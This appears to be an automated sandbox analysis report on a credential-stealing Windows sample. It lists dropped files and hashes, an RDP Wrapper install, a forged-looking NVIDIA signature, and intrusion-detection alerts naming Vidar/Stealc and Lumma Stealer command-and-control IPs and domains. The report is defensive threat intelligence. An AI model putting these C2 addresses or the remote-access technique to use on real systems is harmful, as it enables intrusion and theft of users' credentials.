File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5de72d9ebd_rdp[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73216
Entropy (8bit):	7.662183287075988
Encrypted:	false
SSDEEP:	1536:uZAhxe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/LkTRSO6kiz:hhx0I26z/8uz22gaxH2zLiRSO6Jz
MD5:	D02AAA17F2AE30945D65603531DCAE56
SHA1:	17B95FD290773864B58D928D3CA5641C02808D26
SHA-256:	3D0E422CF87C34B396C8D7A2F58DC10321E6D299377EBD08806A4D9DDD2AE203
SHA-512:	34C61409D3EFF365AA0329582CEF186A308C0027085B9D10EAB0E5AA3BC882989670A6D8985A6D7F39A213770E7FCA32342D894CB8F1E5064A8381EF4A29D65A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5de72d9ebd_rdp[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2.@..........."...0..............!... ...@....@.. ....................................`..................................!..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......\...T%..........h,...............................................(".....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r6..p(....(O...(.....r(..p(....(....rZ..p(....oE...:....r...p(....rZ..p(.....r]..p(.....{....r]..p(....(R...oS...(T...b.:....r...p(.....oU....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.398579184630514
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sz:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFG
MD5:	E5C7F76F493D70CE78FF3E86593D8041
SHA1:	E9B868BD7394CC7B044C44A84A38C5274B2AEA82
SHA-256:	087BC87CB3A226D139166BACE25EAB818C2D62BB6C55FCE7EADE5A096D1BE3FF
SHA-512:	37DCAFFE8CF3314B45431BE5A84BA3751CF79A06439D6DB6E88263A2EF943891B4CDF6430AE871D0716E208C532A3C5027DCED61855B2D027F88442E583C9ACE
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.39904086879605
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2SM:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFR
MD5:	43C2BC2CB0A0BD593AA867B64B08366B
SHA1:	152043692DF4BE96D43503CC4D9E8B4D6374C57B
SHA-256:	E6AE44A0EA1F7F357086300947A5EB56A634A7CAB0D08FDA8717076902697927
SHA-512:	4F545B40E3F7CDF71A19DDE9EF5EE190D316AAA3CB98AB9CE1B3894D13FB53255CBBA8979110B71E93C7674393489B54B077A1882D21F7AE9DE3241D2C644A5F
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Download File

Process:	C:\ProgramData\BKJKEBGDHD.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1785344
Entropy (8bit):	6.646511331349125
Encrypted:	false
SSDEEP:	24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
MD5:	C213162C86BB943BCDF91B3DF381D2F6
SHA1:	8EC200E2D836354A62F16CDB3EED4BB760165425
SHA-256:	AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
SHA-512:	B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..\|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...\|..................@..@.............p......................@..@................................................................................................

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:y11444444444444444444444444444444444444444444444444444444444444j:st
MD5:	4B51CC94E0613C4A61A000A1756E7A52
SHA1:	84990805F9A1D8716198DDA174E9160890386891
SHA-256:	F2D1DC12D293F24C7160CAF8A48D863D381FA579CC11DCBCA38ACB69BC64F874
SHA-512:	16AAF21F84EA8CAFEB3F368B61B802F3045AECADE55EDCE1755C59B35ED1A4203FBC6C8BE3325ECB1FE946F1B357907F754B67221199A47DF362DA749BC6F0C2
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\rfxvmt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.2359263506290326
Encrypted:	false
SSDEEP:	3:t:t
MD5:	F1CA165C0DA831C9A17D08C4DECBD114
SHA1:	D750F8260312A40968458169B496C40DACC751CA
SHA-256:	ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
SHA-512:	052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
Malicious:	false
Preview:	Ok.....

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.989785675826036
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	413'224 bytes
MD5:	6fd36225fe8b30bef2ba91748be1be69
SHA1:	1dd29bec09dcb70474865f9aa06158d4ba60df77
SHA256:	5c0e7c82e65dfbf8b4416abe9734d66b52acfd695a0686107454f12698f329db
SHA512:	5eb88f76f22aa8edc48545047040e00333e789922ffeee01d79504f5197e0130e2f207e34c3961de6bde888506b0279c04ceadd9147812d938266fdfad172fc2
SSDEEP:	12288:I07ad1g0uGMpnLs5AdFTVuHxBZ9Cwd4hwJqXrBEO:1dHQHNEdr7Bt
TLSH:	469423722BFEE699F77C4532AE23EB1303E2ED64E5EB4586C131C608514E354394E9AC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x463c3e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F5DB0A [Thu Sep 26 22:07:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x63be8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x62800	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x63ab0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x61c44	0x61e00	9c8fa6f96ef950c04ef24aec42a5485f	False	0.9938138569604087	data	7.996079292022533	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x5c8	0x600	db1daa9db276719b7dce2f7fee59adb7	False	0.4361979166666667	data	4.115782972549961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	668ddc03321cdfb17f8be719cbc539e8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x334	data			0.4426829268292683
RT_MANIFEST	0x643d8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T00:28:29.477619+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57877	5.75.211.162	443	TCP
2024-09-27T00:28:30.808738+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57878	5.75.211.162	443	TCP
2024-09-27T00:28:32.182085+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57879	5.75.211.162	443	TCP
2024-09-27T00:28:33.571933+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57880	5.75.211.162	443	TCP
2024-09-27T00:28:34.275365+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.6	57880	TCP
2024-09-27T00:28:34.930020+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57881	5.75.211.162	443	TCP
2024-09-27T00:28:35.643996+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.6	57881	5.75.211.162	443	TCP
2024-09-27T00:28:35.644005+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.6	57881	TCP
2024-09-27T00:28:36.410141+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57882	5.75.211.162	443	TCP
2024-09-27T00:28:37.422761+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57883	5.75.211.162	443	TCP
2024-09-27T00:28:40.578814+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57884	5.75.211.162	443	TCP
2024-09-27T00:28:41.676249+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57885	5.75.211.162	443	TCP
2024-09-27T00:28:42.813029+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57886	5.75.211.162	443	TCP
2024-09-27T00:28:43.908857+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57887	5.75.211.162	443	TCP
2024-09-27T00:28:45.641020+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57888	5.75.211.162	443	TCP
2024-09-27T00:28:47.649559+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57890	5.75.211.162	443	TCP
2024-09-27T00:28:49.228375+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57891	5.75.211.162	443	TCP
2024-09-27T00:28:50.789135+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57892	5.75.211.162	443	TCP
2024-09-27T00:28:52.068485+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57893	5.75.211.162	443	TCP
2024-09-27T00:28:55.175699+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57894	5.75.211.162	443	TCP
2024-09-27T00:28:56.630209+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57895	5.75.211.162	443	TCP
2024-09-27T00:28:58.006840+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57896	5.75.211.162	443	TCP
2024-09-27T00:28:59.441471+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57897	5.75.211.162	443	TCP
2024-09-27T00:29:01.494684+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57899	5.75.211.162	443	TCP
2024-09-27T00:29:03.467077+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57900	5.75.211.162	443	TCP
2024-09-27T00:29:04.946721+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	57901	147.45.44.104	80	TCP
2024-09-27T00:29:05.908172+0200	2056176	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop)	1	192.168.2.6	59699	1.1.1.1	53	UDP
2024-09-27T00:29:06.239823+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57902	5.75.211.162	443	TCP
2024-09-27T00:29:06.400022+0200	2056177	ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)	1	192.168.2.6	57903	172.67.194.216	443	TCP
2024-09-27T00:29:06.870506+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	57903	172.67.194.216	443	TCP
2024-09-27T00:29:06.870506+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	57903	172.67.194.216	443	TCP
2024-09-27T00:29:06.877960+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.6	59417	1.1.1.1	53	UDP
2024-09-27T00:29:07.364776+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	57901	147.45.44.104	80	TCP
2024-09-27T00:29:07.370769+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.6	57904	104.21.4.136	443	TCP
2024-09-27T00:29:07.851698+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	57904	104.21.4.136	443	TCP
2024-09-27T00:29:07.851698+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	57904	104.21.4.136	443	TCP
2024-09-27T00:29:07.856404+0200	2056162	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)	1	192.168.2.6	51828	1.1.1.1	53	UDP
2024-09-27T00:29:08.362064+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.6	57906	188.114.97.3	443	TCP
2024-09-27T00:29:08.394353+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57905	5.75.211.162	443	TCP
2024-09-27T00:29:08.829782+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	57906	188.114.97.3	443	TCP
2024-09-27T00:29:08.829782+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	57906	188.114.97.3	443	TCP
2024-09-27T00:29:08.834186+0200	2056160	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)	1	192.168.2.6	50348	1.1.1.1	53	UDP
2024-09-27T00:29:09.391861+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.6	57908	188.114.96.3	443	TCP
2024-09-27T00:29:09.657271+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	57901	147.45.44.104	80	TCP
2024-09-27T00:29:09.900040+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	57908	188.114.96.3	443	TCP
2024-09-27T00:29:09.900040+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	57908	188.114.96.3	443	TCP
2024-09-27T00:29:09.902627+0200	2056158	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)	1	192.168.2.6	51250	1.1.1.1	53	UDP
2024-09-27T00:29:10.449927+0200	2056159	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)	1	192.168.2.6	57910	188.114.97.3	443	TCP
2024-09-27T00:29:10.529995+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57909	5.75.211.162	443	TCP
2024-09-27T00:29:10.906459+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	57910	188.114.97.3	443	TCP
2024-09-27T00:29:10.906459+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	57910	188.114.97.3	443	TCP
2024-09-27T00:29:10.921550+0200	2056156	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)	1	192.168.2.6	60424	1.1.1.1	53	UDP
2024-09-27T00:29:11.433352+0200	2056157	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)	1	192.168.2.6	57912	172.67.162.108	443	TCP
2024-09-27T00:29:11.891502+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	57912	172.67.162.108	443	TCP
2024-09-27T00:29:11.891502+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	57912	172.67.162.108	443	TCP
2024-09-27T00:29:11.953153+0200	2056154	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)	1	192.168.2.6	63755	1.1.1.1	53	UDP
2024-09-27T00:29:12.217613+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57913	5.75.211.162	443	TCP
2024-09-27T00:29:12.466412+0200	2056155	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)	1	192.168.2.6	57914	188.114.97.3	443	TCP
2024-09-27T00:29:12.953361+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	57914	188.114.97.3	443	TCP
2024-09-27T00:29:12.953361+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	57914	188.114.97.3	443	TCP
2024-09-27T00:29:12.956706+0200	2056152	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)	1	192.168.2.6	61967	1.1.1.1	53	UDP
2024-09-27T00:29:13.451656+0200	2056153	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)	1	192.168.2.6	57916	188.114.97.3	443	TCP
